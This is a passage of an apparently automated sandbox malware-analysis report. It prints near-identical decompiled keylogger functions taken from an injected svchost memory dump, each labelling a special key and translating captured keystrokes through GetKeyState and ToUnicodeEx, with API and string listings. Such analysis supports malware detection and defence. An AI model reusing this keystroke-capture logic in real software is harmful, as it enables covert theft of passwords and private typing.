						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Zoom], xrefs: 00C85A29

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B59, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B59(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F2]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F2], xrefs: 00C85B5B

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C859B0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859B0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Process]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Process], xrefs: 00C859B2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8599F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8599F(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Play]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Play], xrefs: 00C859A1
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D46, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D46(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Print]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Print], xrefs: 00C85D48

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D84, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D84(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Right Alt]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Right Alt], xrefs: 00C85D86

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C859D2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859D2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Select]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
